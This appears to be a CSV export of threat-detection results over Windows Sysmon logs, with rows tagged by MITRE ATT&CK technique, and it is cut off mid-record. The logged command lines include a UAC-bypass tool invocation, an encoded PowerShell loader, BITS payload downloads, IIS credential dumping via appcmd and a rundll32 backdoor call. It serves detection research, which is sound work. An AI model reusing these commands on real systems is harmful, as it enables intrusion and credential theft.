1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16443 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-12 13:58:54.772 + 365ABB72-269E-5CD8-0000-001084F81A00 + 2728 + C:\Windows\System32\rundll32.exe + 6.1.7600.16385 (win7_rtm.090713-1255) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\rundll32.exe" zipfldr.dll,RouteTheCall c:\Windows\System32\calc.exe + C:\Users\IEUser\Downloads\WinPwnage-master\WinPwnage-master\ + IEWIN7\IEUser + 365ABB72-2523-5CD8-0000-00204C360100 + 0x1364c + 1 + Medium + SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238 + 365ABB72-268F-5CD8-0000-0010F4A51700 + 1256 + C:\Python27\python.exe + python winpwnage.py -u execute -i 14 -p c:\Windows\System32\calc.exe + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( c:\windows\System32\cmd.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 16040 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-11 17:28:22.488 + 365ABB72-0636-5CD7-0000-0010A6C72100 + 544 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + c:\windows\System32\cmd.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-F9CD-5CD6-0000-00201B370100 + 0x1371b + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-0545-5CD7-0000-001078371F00 + 3044 + C:\Windows\System32\dllhost.exe + C:\Windows\system32\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7} + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.43525,2019-05-27T05:29:20.435250+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5988 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.375 + 365ABB72-3D70-5CEB-0000-001032EAFF00 + 1004 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir ". )" /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1197] BITS Jobs - Process,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4893 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.238 + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435983.886611,2019-07-30T01:33:03.886611+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4893 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.238 + 747F3D96-660F-5D3F-0000-001055378600 + 2948 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c powershell -c "Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1 + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.305063,2019-05-27T05:29:20.305063+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5985 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.265 + 365ABB72-3D70-5CEB-0000-001072E6FF00 + 2640 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:password + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1564435983.254713,2019-07-30T01:33:03.254713+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 4892 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2019-07-29 21:33:03.184 + 747F3D96-660F-5D3F-0000-00109B328600 + 6020 + C:\Windows\System32\cmd.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + cmd /c bitsadmin.exe /transfer "JobName" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt "C:\Windows\system32\Default_File_Path.ps1" + C:\Windows\system32\ + MSEDGEWIN10\IEUser + 747F3D96-6053-5D3F-0000-002082314100 + 0x413182 + 1 + High + SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18 + 747F3D96-6609-5D3F-0000-00109FBF8500 + 1208 + C:\Windows\System32\cmd.exe + "C:\Windows\System32\cmd.exe" /C "C:\ProgramData\ssh\runtests.bat" + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1553017268.977707,2019-03-19T21:41:08.977707+04:00,,Threat,Low,Found User (EXAMPLE\user01) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.EXE /c malwr.vbs ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 1966184 + + + + + Microsoft-Windows-Sysmon/Operational + PC01.example.corp + + + + + + 2019-03-19 17:41:08.947 + 365ABB72-29B4-5C91-0000-0010289AC308 + 3748 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + C:\Windows\system32\cmd.EXE /c malwr.vbs + C:\Windows\system32\ + EXAMPLE\user01 + 365ABB72-2209-5C91-0000-0020FA479E03 + 0x39e47fa + 2 + High + MD5=AD7B9C14083B52BC532FBA5948342B98,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-1A4A-5C91-0000-0010455A0000 + 512 + C:\Windows\System32\services.exe + C:\Windows\system32\services.exe + +",PC01.example.corp,Microsoft-Windows-Sysmon/Operational +[T1117] Bypassing Application Whitelisting,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /c notepad.exe ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 11126 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-09 02:08:00.336 + 365ABB72-8B80-5CD3-0000-001065512A00 + 2264 + C:\Windows\System32\cmd.exe + 6.1.7601.17514 (win7sp1_rtm.101119-1850) + Windows Command Processor + Microsoft® Windows® Operating System + Microsoft Corporation + "C:\Windows\System32\cmd.exe" /c notepad.exe + C:\Windows\system32\ + IEWIN7\IEUser + 365ABB72-863B-5CD3-0000-00204A390100 + 0x1394a + 1 + High + SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163 + 365ABB72-8B77-5CD3-0000-0010E8FD2900 + 3836 + C:\Windows\System32\sdclt.exe + ? + +",IEWIN7,Microsoft-Windows-Sysmon/Operational +"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1085] Rundll32 Execution detected,1584766817.996004,2020-03-21T09:00:17.996004+04:00,,Threat,High,"Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor )",1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 243514 + + + + + Microsoft-Windows-Sysmon/Operational + MSEDGEWIN10 + + + + + + 2020-03-21 05:00:17.511 + 747F3D96-9F61-5E75-0000-0010736B1E00 + 8116 + C:\Windows\System32\rundll32.exe + 10.0.17763.1 (WinBuild.160101.0800) + Windows host process (Rundll32) + Microsoft® Windows® Operating System + Microsoft Corporation + RUNDLL32.EXE + rundll32 windowscoredeviceinfo.dll,CreateBackdoor + C:\Windows\system32\ + NT AUTHORITY\SYSTEM + 747F3D96-9DBA-5E75-0000-0020E7030000 + 0x3e7 + 0 + System + SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A + 747F3D96-9DBC-5E75-0000-00102C390100 + 1652 + C:\Windows\System32\svchost.exe + C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv + +",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational +[T1059] Command-Line Interface,1558920560.204919,2019-05-27T05:29:20.204919+04:00,,Threat,Low,Found User (IIS APPPOOL\DefaultAppPool) running image ( C:\Windows\System32\inetsrv\appcmd.exe ) through command line ( "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName ),1," + + + + + 1 + 5 + 4 + 1 + 0 + 0x8000000000000000 + + + 5982 + + + + + Microsoft-Windows-Sysmon/Operational + IEWIN7 + + + + + + 2019-05-27 01:29:20.164 + 365ABB72-3D70-5CEB-0000-0010B2E2FF00 + 2108 + C:\Windows\System32\inetsrv\appcmd.exe + 7.5.7600.16385 (win7_rtm.090713-1255) + Application Server Command Line Admin Tool + Internet Information Services + Microsoft Corporation + "C:\Windows\System32\inetsrv\appcmd.exe" list vdir /text:userName + C:\Windows\Temp\ + IIS APPPOOL\DefaultAppPool + 365ABB72-B26B-5CEA-0000-002023240800 + 0x82423 + 0 + High + SHA1=C5423FEF0E8E211BB8BAB9C11E730048BBED7B29,MD5=0E5BC786206A3762CE47A0A2DBD01D7B,SHA256=113F68086A3F02276395CB70C72B00ED33A47FD00820D229093CD6ADDC2F73F4,IMPHASH=1697BBEAB0AC62DD7B8016CE25425F45 + 365ABB72-3D4A-5CEB-0000-0010FA93FD00 + 2584 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -noni -enc 